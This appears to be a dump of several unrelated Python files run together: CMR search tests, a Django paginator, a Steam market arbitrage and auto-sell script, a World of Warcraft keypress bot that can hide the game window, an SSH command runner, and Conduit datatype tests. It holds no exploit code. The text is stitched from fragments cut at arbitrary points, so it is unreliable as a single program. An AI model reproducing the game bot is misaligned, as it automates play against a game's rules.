high_state['page_size']) self.assertEqual(4000, high_state['limit']) high_state = scom.create_page_state(limit=2048) self.assertEqual(683, high_state['page_size']) # pylint: disable=W0212 def test_continue_download(self): """Test the function that checks if enough records have been downloaded""" #limit to 10, 10 per page, first page page_state = scom.create_page_state() self.assertFalse(scom._continue_download(page_state)) #limit to 1000, 1000 per page, first page page_state = scom.create_page_state(limit=1000) self.assertFalse(scom._continue_download(page_state)) #limit to 4000, 2000 per page, first page page_state = scom.create_page_state(limit=4000) self.assertTrue(scom._continue_download(page_state)) #limit to 1000, 2000 per page, second page page_state = scom.create_page_state(page_num=2, limit=4000) self.assertFalse(scom._continue_download(page_state)) #limit to 1000, 683 per page, second page page_state = scom.create_page_state(page_num=1, limit=2048) self.assertTrue(scom._continue_download(page_state)) #limit to 2048, 683 per page, second page page_state = scom.create_page_state(page_num=2, limit=2048) self.assertTrue(scom._continue_download(page_state)) #limit to 2048, 683 per page, third page page_state = scom.create_page_state(page_num=3, limit=2048) self.assertFalse(scom._continue_download(page_state)) # pylint: disable=W0212 def test_standard_headers_from_config(self): """Test that standard headers can be setup""" basic_expected = {'Client-Id': 'python_cmr_lib', 'User-Agent': 'python_cmr_lib'} basic_result = scom._standard_headers_from_config({'a':1}) self.assertEqual(basic_expected, basic_result) config = {'cmr-token': 'a-cmr-token', 'X-Request-Id': '0123-45-6789', 'Client-Id': 'fancy-client', 'Not-A-Header': 'do not include me'} defined_expected = {'Echo-Token': 'a-cmr-token', 'X-Request-Id': '0123-45-6789', 'User-Agent': 'python_cmr_lib', 'Client-Id': 'fancy-client'} defined_result = scom._standard_headers_from_config(config) self.assertEqual(defined_expected, defined_result) config = {'cmr-token': '', 'Not-A-Header': 'do not include me'} token_expected = {'Echo-Token': '', 'User-Agent': 'python_cmr_lib', 'Client-Id': 'python_cmr_lib'} token_result = scom._standard_headers_from_config(config) self.assertEqual(token_expected, token_result) # pylint: disable=W0212 def test_cmr_query_url(self): """ Test that a CMR url can be built correctly""" page_state = scom.create_page_state() result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=10&provider=p01' self.assertEqual(expected, result) #now test for scrolling page_state = scom.create_page_state(limit=2048) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) #now test for scrolling result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit.'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={}) expected = 'https://cmr.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {}, page_state, config={}) expected = 'https://cmr.earthdata.nasa.gov/search/search?' \ 'page_size=683&scroll=true' self.assertEqual(expected, result) @patch('urllib.request.urlopen') def test_scroll(self, urlopen_mock): """ Test the scroll clear function to see if it returns an error or not""" recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_good.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 204) result = scom.clear_scroll('-1') self.assertFalse('errors' in result) recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_bad.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 404) result = scom.clear_scroll('0') self.assertTrue('errors' in result) @patch('urllib.request.urlopen') def test__make_search_request(self, urlopen_mock): """ Test the inner function which performs the first half of a search """ recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_good.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 204) page_state = scom.create_page_state() page_state['CMR-Scroll-Id'] = 'abcd' response = scom._make_search_request('search', {'keyword':'water'}, page_state, {'env':'sit'}) self.assertEqual({'http-headers': {}}, response, 'test that the scroll id code gets touched') @patch('urllib.request.urlopen') @patch('cmr.search.common.clear_scroll') def test_search_by_page(self, clr_scroll_mock, urlopen_mock): """ Test the inner function which performs the first half of a search """ recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) query = {'keyword':'water'} response = scom.search_by_page('collections', query) self.assertEqual(10, len(response), 'assumed page_state') # page state uses scroll page_state = scom.create_page_state(limit=4000) urlopen_mock.return_value = valid_cmr_response(recorded_file, 200, [('CMR-Scroll-Id','si-01')]) page_state['CMR-Scroll-Id'] = 'abcd' response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(20, len(response), 'assumed page_state') # error processing 1 urlopen_mock.return_value = tutil.MockResponse("I'm a tea pot", 418) response = scom.search_by_page('collections', query, config={'debug':True}) expected = {'errors': ['unknown response: I\'m a tea pot'], 'code': 0, 'reason': 'unknown response: I\'m a tea pot'} self.assertEqual(expected, response, "exeption") # error processing 2 urlopen_mock.return_value = valid_cmr_response('{"errors":["Error"]}', 500) urlopen_mock.side_effect = urlerr.HTTPError(Mock(status=500), "500", "Server Error", None, None) response = scom.search_by_page('collections', query) expected = {'code': '500', 'reason': 'Server Error', 'errors': ['Server Error']} self.assertEqual(expected, response, "exeption") # bad clear response is logged recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') clr_scroll_mock.return_value = {'errors': ['bad scroll id']} urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) urlopen_mock.side_effect = None response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(10, len(response), "bad scroll id") # takes to long recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') page_state['took'] = 300001 page_state['page_size'] = 1 urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(10, len(response), "bad scroll id") @patch('urllib.request.urlopen') def test_experimental_search(self, urlopen_mock): """ def search(query=None, filters=None, limit=None, options=None): """ # Setup recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') # Basic urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) generator = scom.experimental_search_by_page_generator('collections', {'provider':'SEDAC'}) for item in generator: self.assertEqual("ORNL_DAAC", item['meta']['provider-id'], 'basic test') # page state uses scroll urlopen_mock.return_value = valid_cmr_response(recorded_file, 200, [('CMR-Scroll-Id','abcd')]) page_state = scom.create_page_state(limit=4000) page_state['CMR-Scroll-Id'] = 'abcd' generator = scom.experimental_search_by_page_generator('collections', {'provider':'SEDAC'}, page_state=page_state) for item in generator: self.assertEqual("ORNL_DAAC", item['meta']['provider-id'], 'trigger scrloll id check') # error processing writes to log urlopen_mock.side_effect = urlerr.HTTPError(Mock(status=500), "500", "Server Error", None, None) generator = None try: with self.assertLogs(scom.logger, level='ERROR') as test_log: try: end_point = 'collections' query = {'provider':'ORNL_DAAC'} generator = scom.experimental_search_by_page_generator(end_point, query) _ = next(generator) #consume generator to force action except StopIteration: pass #self.assertTrue(True, "generator should be empty") self.assertEqual(test_log.output, ["ERROR:cmr.search.common:Error in generator: Server Error."], "logs not matching") except AssertionError: self.fail('no log entry') @patch('webbrowser.open') def test_open_api(self, webopener): """ Test the function of the open_api without actually opening it """ webopener.return_value = "ok" self.assertEqual(None, scom.open_api('section')) # need to test search_by_page 10-100 from django.core.paginator import EmptyPage from django.core.paginator import Paginator from django.core.paginator import PageNotAnInteger def paginator(page, object_list, per_page=40): """ Provides pagination for a given list of objects. Call function for any page needing pagination. """ paginator = Paginator( object_list, per_page) # Show default 40 objects per page try: objects = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. objects = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. objects = [] return objects from core.editor import Editor from core.tools.pencil import Pencil from random import random class Salt(Pencil): def __init__(self, button, board): super(Salt, self).__init__(button, board) def _need_change(self, value): if self._fill == value: return False else: return random() ** 0.5 < Editor()["random"] 10-100 # Objective: find market arbitrages, e.g. sell a pack for more (fee excluded) than the cost to craft it (fee included). from creation_time_utils import fill_in_badges_with_next_creation_times_loaded_from_disk from creation_time_utils import get_current_time, determine_whether_a_booster_pack_can_be_crafted from inventory_utils import create_then_sell_booster_packs_for_batch from market_listing import get_steam_market_listing_url, update_marketability_status from market_order import load_market_order_data from market_utils import load_aggregated_badge_data from sack_of_gems import print_gem_price_reminder from transaction_fee import compute_sell_price_without_fee from utils import convert_listing_hash_to_app_id from utils import get_bullet_point_for_display from utils import get_steam_store_url from utils import get_steamcardexchange_url def determine_whether_booster_pack_was_crafted_at_least_once(badge_data: dict) -> bool: next_creation_time = badge_data['next_creation_time'] booster_pack_has_been_crafted_at_least_once = bool(next_creation_time is not None) return booster_pack_has_been_crafted_at_least_once def filter_out_badges_never_crafted(aggregated_badge_data: dict[int, dict], verbose: bool = True) -> dict[int, dict]: # Filter out games for which a booster pack was never crafted (according to 'data/next_creation_times.json'), # thus focus on games which are tracked more closely, because they are likely to show a market arbitrage (again). filtered_badge_data = dict() for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] booster_pack_is_tracked = determine_whether_booster_pack_was_crafted_at_least_once(individual_badge_data) if booster_pack_is_tracked: filtered_badge_data[app_id] = individual_badge_data if verbose: print('There are {} booster packs which are tracked, as they were crafted at least once. ({} omitted)'.format( len(filtered_badge_data), len(aggregated_badge_data) - len(filtered_badge_data))) return filtered_badge_data def filter_out_badges_recently_crafted(aggregated_badge_data: dict[int, dict], verbose: bool = True) -> dict[int, dict]: # Filter out games for which a booster pack was crafted less than 24 hours ago, # and thus which cannot be immediately crafted. filtered_badge_data = dict() current_time = get_current_time() for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] booster_pack_can_be_crafted = determine_whether_a_booster_pack_can_be_crafted(individual_badge_data, current_time) if booster_pack_can_be_crafted: filtered_badge_data[app_id] = individual_badge_data if verbose: print('There are {} booster packs which can be immediately crafted. ({} excluded because of cooldown)'.format( len(filtered_badge_data), len(aggregated_badge_data) - len(filtered_badge_data))) return filtered_badge_data def determine_whether_an_arbitrage_might_exist(badge_data: dict, user_chosen_price_threshold: float = None) -> bool: sell_price_including_fee = badge_data['sell_price'] sell_price_without_fee = compute_sell_price_without_fee(sell_price_including_fee) try: gem_price_with_fee = badge_data['gem_price'] except KeyError: # This should only happen if the badge data is dummy (for profile backgrounds and emoticons). Typically, the # user prefers to rely on a user-chosen price threshold, and did not take the time to fill-in a dummy value for # the 'gem_price' field in badge_data. gem_price_with_fee = None if user_chosen_price_threshold is None: # Variable price threshold, automatically computed for each game. # Always use this option if you work with BOOSTER PACKS, because the cost to craft a pack changes for each game! price_threshold = gem_price_with_fee else: # Constant price threshold, enforced by the user. # Caveat: this is only useful to prune out candidates for PROFILE BACKGROUNDS or EMOTICONS, because the cost to # craft a **badge** does not depend on the game, contrary to the cost to craft a **booster pack**. price_threshold = user_chosen_price_threshold if price_threshold is None: raise AssertionError() an_arbitrage_might_exist = bool(price_threshold < sell_price_without_fee) return an_arbitrage_might_exist def determine_whether_sell_price_is_unknown(badge_data: dict) -> bool: sell_price_including_fee = badge_data['sell_price'] sell_price_was_not_retrieved = bool(sell_price_including_fee < 0) there_is_no_sell_order = bool(sell_price_including_fee == 0) sell_price_is_unknown = sell_price_was_not_retrieved or there_is_no_sell_order return sell_price_is_unknown def filter_out_badges_with_low_sell_price(aggregated_badge_data: dict[int | str, dict], user_chosen_price_threshold: float = None, category_name: str = None, verbose: bool = True) -> dict[int | str, dict]: # Filter out games for which the sell price (ask) is lower than the gem price, # because the bid is necessarily lower than the ask, so it will not be worth downloading bid data for these games. if category_name is None: category_name = 'booster packs' if user_chosen_price_threshold is None: threshold_name = 'gem price' else: threshold_name = 'user-chosen price threshold {:.2f} €'.format( user_chosen_price_threshold / 100 ) filtered_badge_data = dict() unknown_price_counter = 0 for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] sell_price_is_unknown = determine_whether_sell_price_is_unknown(individual_badge_data) an_arbitrage_might_exist = determine_whether_an_arbitrage_might_exist(individual_badge_data, user_chosen_price_threshold=user_chosen_price_threshold) if sell_price_is_unknown or an_arbitrage_might_exist: filtered_badge_data[app_id] = individual_badge_data if sell_price_is_unknown: unknown_price_counter += 1 if verbose: print('There are {} {} with sell price unknown ({}) or strictly higher than {} ({}).'.format( len(filtered_badge_data), category_name, unknown_price_counter, threshold_name, len(filtered_badge_data) - unknown_price_counter)) return filtered_badge_data def find_badge_arbitrages(badge_data: dict, market_order_dict: dict[str, dict] = None, verbose: bool = False) -> dict[str, dict]: if market_order_dict is None: market_order_dict = load_market_order_data(badge_data, retrieve_market_orders_online=True) badge_arbitrages = dict() for app_id in badge_data.keys(): individual_badge_data = badge_data[app_id] gem_price_including_fee = individual_badge_data['gem_price'] listing_hash = individual_badge_data['listing_hash'] try: bid_including_fee = market_order_dict[listing_hash]['bid'] except KeyError: bid_including_fee = -1 if verbose: print('Bid not found for {}. Reason is likely that you asked not to retrieve market orders.'.format( listing_hash )) bid_without_fee = compute_sell_price_without_fee(bid_including_fee) if bid_including_fee < 0: continue delta = bid_without_fee - gem_price_including_fee # Check whether there is a profit to be made is_an_arbitrage = bool(delta > 0) if is_an_arbitrage: badge_arbitrages[listing_hash] = dict() # Warning: for profile backgrounds and emoticons, you cannot trust the value of app_id stored here, # because app_id is a dummy variable, which is simply a copy of listing_hash. # # However, for booster packs, app_id is correct, because there is a one-to-one mapping between # appIDs and listing hashes of booster packs. badge_arbitrages[listing_hash]['app_id'] = app_id try: badge_arbitrages[listing_hash]['name'] = individual_badge_data['name'] except KeyError: badge_arbitrages[listing_hash]['name'] = None try: badge_arbitrages[listing_hash]['gem_amount'] = individual_badge_data['gem_amount'] except KeyError: badge_arbitrages[listing_hash]['gem_amount'] = None badge_arbitrages[listing_hash]['gem_price_including_fee'] = individual_badge_data['gem_price'] badge_arbitrages[listing_hash]['sell_price'] = individual_badge_data['sell_price'] badge_arbitrages[listing_hash]['ask_including_fee'] = market_order_dict[listing_hash]['ask'] badge_arbitrages[listing_hash]['bid_including_fee'] = market_order_dict[listing_hash]['bid'] badge_arbitrages[listing_hash]['ask_volume'] = market_order_dict[listing_hash]['ask_volume'] badge_arbitrages[listing_hash]['bid_volume'] = market_order_dict[listing_hash]['bid_volume'] badge_arbitrages[listing_hash]['is_marketable'] = market_order_dict[listing_hash]['is_marketable'] badge_arbitrages[listing_hash]['bid_without_fee'] = bid_without_fee badge_arbitrages[listing_hash]['profit'] = delta if verbose: print('{:.2f}€\t{}'.format(delta, listing_hash)) return badge_arbitrages def print_arbitrages(badge_arbitrages: dict[str, dict], use_numbered_bullet_points: bool = False, use_hyperlink: bool = False) -> None: bullet_point = get_bullet_point_for_display(use_numbered_bullet_points=use_numbered_bullet_points) for listing_hash in sorted(badge_arbitrages.keys(), key=lambda x: badge_arbitrages[x]['profit'], reverse=True): arbitrage = badge_arbitrages[listing_hash] # Skip unmarketable booster packs if not arbitrage['is_marketable']: continue if use_hyperlink: app_id = convert_listing_hash_to_app_id(listing_hash) markdown_compatible_steam_market_url = get_steam_market_listing_url(listing_hash=listing_hash, render_as_json=False, replace_spaces=True) listing_hash_formatted_for_markdown = '[[store]({})][[market]({})] [{}]({})'.format( get_steam_store_url(app_id), markdown_compatible_steam_market_url, listing_hash, get_steamcardexchange_url(app_id), ) else: listing_hash_formatted_for_markdown = listing_hash gem_amount = arbitrage['gem_amount'] if gem_amount is None: gem_amount_as_str = gem_amount else: gem_amount_as_str = '{:.0f}'.format(gem_amount) print( '{}Profit: {:.2f}€\t{}\t| craft pack: {} gems ({:.2f}€) | sell for {:.2f}€ ({:.2f}€ incl. fee) (#={})'.format( bullet_point, arbitrage['profit'], listing_hash_formatted_for_markdown, gem_amount_as_str, arbitrage['gem_price_including_fee'], arbitrage['bid_without_fee'], arbitrage['bid_including_fee'], arbitrage['bid_volume'], )) return def convert_arbitrages_for_batch_create_then_sell(badge_arbitrages: dict[str, dict], profit_threshold: float = 0.01, # profit in euros verbose: bool = True) -> dict[str, float]: # Code inspired from print_arbitrages() price_dict_for_listing_hashes = dict() for listing_hash in sorted(badge_arbitrages.keys(), key=lambda x: badge_arbitrages[x]['profit'], reverse=True): arbitrage = badge_arbitrages[listing_hash] # Skip unmarketable booster packs if not arbitrage['is_marketable']: continue if arbitrage['profit'] < profit_threshold: break price_in_cents = 100 * arbitrage['bid_without_fee'] price_dict_for_listing_hashes[listing_hash] = price_in_cents if verbose: print(price_dict_for_listing_hashes) return price_dict_for_listing_hashes def update_badge_arbitrages_with_latest_market_order_data(badge_data: dict[int, dict], arbitrage_data: dict[str, dict], retrieve_market_orders_online: bool = True, verbose: bool = False) -> dict[str, dict]: # Objective: ensure that we have the latest market orders before trying to automatically create & sell booster packs # Based on arbitrage_data, select the badge_data for which we want to download (again) the latest market orders: selected_badge_data = dict() for listing_hash in arbitrage_data.keys(): arbitrage = arbitrage_data[listing_hash] if arbitrage['is_marketable'] and arbitrage['profit'] > 0: app_id = convert_listing_hash_to_app_id(listing_hash) selected_badge_data[app_id] = badge_data[app_id] market_order_dict = load_market_order_data(badge_data=selected_badge_data, retrieve_market_orders_online=retrieve_market_orders_online) latest_badge_arbitrages = find_badge_arbitrages(badge_data=selected_badge_data, market_order_dict=market_order_dict, verbose=verbose) return latest_badge_arbitrages def get_filtered_badge_data(retrieve_listings_from_scratch: bool = True, enforced_sack_of_gems_price: float = None, minimum_allowed_sack_of_gems_price: float = None, quick_check_with_tracked_booster_packs: bool = False, check_ask_price: bool = True, from_javascript: bool = False) -> dict[int, dict]: aggregated_badge_data = load_aggregated_badge_data(retrieve_listings_from_scratch, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, from_javascript=from_javascript) aggregated_badge_data = fill_in_badges_with_next_creation_times_loaded_from_disk(aggregated_badge_data) if check_ask_price: filtered_badge_data = filter_out_badges_with_low_sell_price(aggregated_badge_data) else: filtered_badge_data = aggregated_badge_data filtered_badge_data = filter_out_badges_recently_crafted(filtered_badge_data) if quick_check_with_tracked_booster_packs: filtered_badge_data = filter_out_badges_never_crafted(filtered_badge_data) return filtered_badge_data def apply_workflow(retrieve_listings_from_scratch: bool = True, retrieve_market_orders_online: bool = True, enforced_sack_of_gems_price: float = None, minimum_allowed_sack_of_gems_price: float = None, automatically_create_then_sell_booster_packs: bool = False, profit_threshold: float = 0.01, # profit in euros quick_check_with_tracked_booster_packs: bool = False, enforce_update_of_marketability_status: bool = False, from_javascript: bool = False) -> bool: if quick_check_with_tracked_booster_packs: print('Quick-check of booster packs with a track record.') retrieve_listings_from_scratch = False retrieve_market_orders_online = True print('Overwriting two arguments:\n\ti) retrieve listings: {},\n\tii) retrieve market orders: {}.'.format( retrieve_listings_from_scratch, retrieve_market_orders_online )) filtered_badge_data = get_filtered_badge_data(retrieve_listings_from_scratch=retrieve_listings_from_scratch, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, quick_check_with_tracked_booster_packs=quick_check_with_tracked_booster_packs, check_ask_price=True, # only set to False in batch_create_packs.py from_javascript=from_javascript) market_order_dict = load_market_order_data(filtered_badge_data, retrieve_market_orders_online=retrieve_market_orders_online) badge_arbitrages = find_badge_arbitrages(filtered_badge_data, market_order_dict) print('# Reminder of the gem price') print_gem_price_reminder(enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, retrieve_gem_price_from_scratch=False) # NB: Here, we set 'retrieve_gem_price_from_scratch' to False, so that: # - we ensure that the price displayed is equal to the price used for the computations of the arbitrages, # - we avoid any issue with status codes, which could happen due to rate limits, after we downloaded the last batch # of market orders, because there was no cooldown at the end. print('# Results after *slow* update of market order data for *many potential* arbitrages') print_arbitrages(badge_arbitrages) latest_badge_arbitrages = update_badge_arbitrages_with_latest_market_order_data(badge_data=filtered_badge_data, arbitrage_data=badge_arbitrages, retrieve_market_orders_online=True) # Update marketability status if enforce_update_of_marketability_status: few_selected_listing_hashes = list(latest_badge_arbitrages.keys()) item_nameids = update_marketability_status(few_selected_listing_hashes=few_selected_listing_hashes) # Override values which had been previously loaded into memory # # Caveat: the file with the updated marketability status is listing_details.json, # the file market_orders.json was **not** updated and would have the wrong marketability status! for listing_hash in few_selected_listing_hashes: latest_badge_arbitrages[listing_hash]['is_marketable'] = item_nameids[listing_hash]['is_marketable'] print('# Results after *quick* update of market order data for *a few detected* arbitrages') print_arbitrages(latest_badge_arbitrages) if automatically_create_then_sell_booster_packs: price_dict_for_listing_hashes = convert_arbitrages_for_batch_create_then_sell(latest_badge_arbitrages, profit_threshold=profit_threshold) creation_results, sale_results = create_then_sell_booster_packs_for_batch(price_dict_for_listing_hashes, focus_on_marketable_items=True) return True def main() -> bool: retrieve_listings_from_scratch = True retrieve_market_orders_online = True enforced_sack_of_gems_price = None minimum_allowed_sack_of_gems_price = None automatically_create_then_sell_booster_packs = True profit_threshold = 0.0 # profit in euros quick_check_with_tracked_booster_packs = False enforce_update_of_marketability_status = True from_javascript = True apply_workflow(retrieve_listings_from_scratch=retrieve_listings_from_scratch, retrieve_market_orders_online=retrieve_market_orders_online, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, automatically_create_then_sell_booster_packs=automatically_create_then_sell_booster_packs, profit_threshold=profit_threshold, quick_check_with_tracked_booster_packs=quick_check_with_tracked_booster_packs, enforce_update_of_marketability_status=enforce_update_of_marketability_status, from_javascript=from_javascript) return True if __name__ == '__main__': main() from __future__ import print_function, absolute_import, division from toga.cassowary.widget import Widget as CassowaryWidget class Widget(CassowaryWidget): @property def _width_hint(self): return self._impl.get_preferred_width() @property def _height_hint(self): return self._impl.get_preferred_height() AutoZul/AutoZul.py import _thread import os import time import win32api import win32con import win32gui num = 0 runtime = False wow = win32gui.FindWindow(0, "魔兽世界") os.system("mode con cols=36 lines=6") os.system("title 自动祖尔聚怪") def hide_wow(): win32gui.ShowWindow(wow, 0) def unhide_wow(): win32gui.ShowWindow(wow, 1) def reg_insert(): win32gui.RegisterHotKey(0, 99, 0, win32con.VK_INSERT) win32gui.RegisterHotKey(0, 98, 0, win32con.VK_DELETE) def event_handle(): global num global runtime msg = win32gui.GetMessage(0, 0, 0) if msg[1][2] == 99: if wow == win32gui.GetForegroundWindow(): i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 检测到在窗口内按下insert键\n" " 开始执行泛化操作!\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") runtime = True elif msg[1][2] == 98: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 程序已中止!\n" " 重新按下insert键开始操作\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") num = 0 runtime = False time.sleep(0.01) def get_wow(): global wow if wow != 0: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 已查找到窗口\n" " 按下insert开始使用...\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") else: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 未查找到窗口\n" " 程序将在3秒后关闭...\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") time.sleep(3) exit(0) def bind_click(x, y): position = win32api.MAKELONG(x, y) win32api.SendMessage(wow, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, position) win32api.SendMessage(wow, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, position) time.sleep(0.01) def run_process(): global runtime while True: if runtime: main_process() time.sleep(24) time.sleep(0.1) def main_process(): global runtime global num flag = 4 while flag >= 0: win32api.SendMessage(wow, win32con.WM_KEYDOWN, 0x20, 0) win32api.SendMessage(wow, win32con.WM_KEYUP, 0x20, 0) win32api.SendMessage(wow, win32con.WM_KEYDOWN, 0x58, 0) win32api.SendMessage(wow, win32con.WM_KEYUP, 0x58, 0) time.sleep(0.1) flag = flag - 1 num = num + 1 i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " AutoZul 正在运行中...\n") print(" 程序已运行 ", num, " 次\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") if True: get_wow() reg_insert() _thread.start_new_thread(run_process, ()) while True: event_handle() # TEST X,Y CLICK # while True: # bind_click(1280, 420) #!/usr/bin/evn python # _*_ coding: utf-8 _*_ import os import argparse from pymatflow.remote.ssh import Ssh """ """ if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-c", "--cmd", type=str, default="pwd", help="command line to execute on server") args = parser.parse_args() # server handle ctl = Ssh() ctl.get_info(os.path.join(os.path.expanduser('~'), ".pymatflow/server_yh.conf")) ctl.login() ctl.execute(args.cmd) src/tests/conduit/python/t_python_conduit_datatype.py100-1000 # Copyright (c) Lawrence Livermore National Security, LLC and other Conduit # Project developers. See top-level LICENSE AND COPYRIGHT files for dates and # other details. No copyright assignment is required to contribute to Conduit. """ file: python_conduit_datatype.py description: Unit tests for conduit::DataType python module interface. """ import sys import unittest from conduit import Node from conduit import DataType from numpy import * class Test_Conduit_Node(unittest.TestCase): def test_simple(self): a_val = uint32(10) b_val = uint32(20) c_val = float64(30.0) n = Node() n['a'] = a_val n['b'] = b_val n['c'] = c_val print(n) d = n.fetch('a').dtype() self.assertEqual(d.id(),DataType.name_to_id("uint32")) print(d) def test_id_to_name(self): names = [DataType.id_to_name(i) for i in range(14)] ids = [DataType.name_to_id(n) for n in names] self.assertEqual(ids,list(range(14))) def test_explicit_set(self): d = DataType() d.set(dtype_id = DataType.name_to_id("uint32"), num_elements = 1, offset = 0, stride = 4, element_bytes = 4) print(d) self.assertEqual(d.id(),DataType.name_to_id("uint32")) self.assertEqual(d.number_of_elements(),1) self.assertEqual(d.offset(),0) self.assertEqual(d.stride(),4) self.assertEqual(d.element_bytes(),4) self.assertEqual(d.endianness(),0) def test_construction(self): dt = DataType(); dt.set_id(DataType.name_to_id("uint32")) dt.set_number_of_elements(10); dt.set_offset(0); dt.set_stride(4); dt.set_element_bytes(4); dt2 = DataType(dt) self.assertEqual(dt.id(),dt2.id()) self.assertEqual(dt.number_of_elements(),dt2.number_of_elements()) self.assertEqual(dt.offset(),dt2.offset()) self.assertEqual(dt.stride(),dt2.stride()) self.assertEqual(dt.element_bytes(),dt2.element_bytes()) self.assertEqual(dt.endianness(),dt2.endianness()) dt3 = DataType() dt3.set(dtype_name="uint32", num_elements=10, offset=0, stride=4, element_bytes=4) self.assertEqual(dt2.id(),dt3.id()) self.assertEqual(dt2.number_of_elements(),dt3.number_of_elements()) self.assertEqual(dt2.offset(),dt3.offset()) self.assertEqual(dt2.stride(),dt3.stride()) self.assertEqual(dt2.element_bytes(),dt3.element_bytes()) self.assertEqual(dt2.endianness(),dt3.endianness()) print(dt) print(dt2) print(dt3) def test_constructor_helpers(self): # objs print(DataType.empty()); print(DataType.object()); print(DataType.list()); # signed integers print(DataType.int8()); print(DataType.int16()); print(DataType.int32()); print(DataType.int64()); # unsigned integers print(DataType.uint8()); print(DataType.uint16()); print(DataType.uint32()); print(DataType.uint64()); # floating point print(DataType.float32()); print(DataType.float64()); # signed integers print(DataType.c_char()); print(DataType.c_short()); print(DataType.c_int()); print(DataType.c_long()); # unsigned integers print(DataType.c_unsigned_char()); print(DataType.c_unsigned_short()); print(DataType.c_unsigned_int()); print(DataType.c_unsigned_long()); # floating point print(DataType.c_float()); print(DataType.c_double()); def test_is_checks(self): # objs edt = DataType.empty() self.assertEqual(edt.name(),"empty") self.assertTrue(edt.is_empty()) # lots of false checks anchored from empty self.assertFalse(edt.is_object()) self.assertFalse(edt.is_list()) # self.assertFalse(edt.is_number()) self.assertFalse(edt.is_floating_point()) self.assertFalse(edt.is_integer()) self.assertFalse(edt.is_signed_integer()) self.assertFalse(edt.is_unsigned_integer()) # self.assertFalse(edt.is_int8()) self.assertFalse(edt.is_int16()) self.assertFalse(edt.is_int32()) self.assertFalse(edt.is_int64()) # self.assertFalse(edt.is_uint8()) self.assertFalse(edt.is_uint16()) self.assertFalse(edt.is_uint32()) self.assertFalse(edt.is_uint64()) # self.assertFalse(edt.is_float32()) self.assertFalse(edt.is_float64()) # self.assertFalse(edt.is_char()) self.assertFalse(edt.is_short()) self.assertFalse(edt.is_int()) self.assertFalse(edt.is_long()) self.assertFalse(edt.is_long_long()) # self.assertFalse(edt.is_signed_char()) self.assertFalse(edt.is_signed_short()) self.assertFalse(edt.is_signed_int()) self.assertFalse(edt.is_signed_long()) self.assertFalse(edt.is_signed_long_long()) # self.assertFalse(edt.is_unsigned_char()) self.assertFalse(edt.is_unsigned_short()) self.assertFalse(edt.is_unsigned_int()) self.assertFalse(edt.is_unsigned_long()) self.assertFalse(edt.is_unsigned_long_long()) # self.assertFalse(edt.is_float()) self.assertFalse(edt.is_double()) self.assertFalse(edt.is_long_double()) # self.assertFalse(edt.is_string()) self.assertFalse(edt.is_char8_str()) # self.assertFalse(edt.is_index_t()) # self.assertFalse(DataType.object().is_empty()) ############# # self.assertTrue(DataType.object().is_object()) self.assertTrue(DataType.list().is_list()) # signed integers self.assertTrue(DataType.int8().is_number()) self.assertTrue(DataType.int8().is_integer()) 